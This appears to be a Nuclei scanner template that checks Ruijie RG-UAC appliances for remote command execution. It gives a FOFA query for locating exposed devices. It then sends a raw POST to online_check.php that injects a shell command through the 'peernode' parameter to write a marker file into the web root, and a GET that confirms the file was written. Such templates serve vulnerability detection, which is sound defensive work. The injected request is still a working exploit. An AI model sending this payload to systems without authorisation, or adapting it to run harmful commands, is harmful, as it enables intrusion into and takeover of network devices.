id: ruijie-rg-uac-rce

info:
  name: Ruijie RG UAC RCE
  author: zp857
  severity: high
  tags: ruijie,rce
  metadata:
    fofa-query: 'app="Ruijie-RG-UAC" || title="RG-UAC"'

requests:
  - raw:
      - |
        POST /view/vpn/autovpn/online_check.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        peernode=1;echo+zp857>/var/www/html/view/vpn/autovpn/zp857.txt+#

      - |
        GET /view/vpn/autovpn/zp857.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "zp857"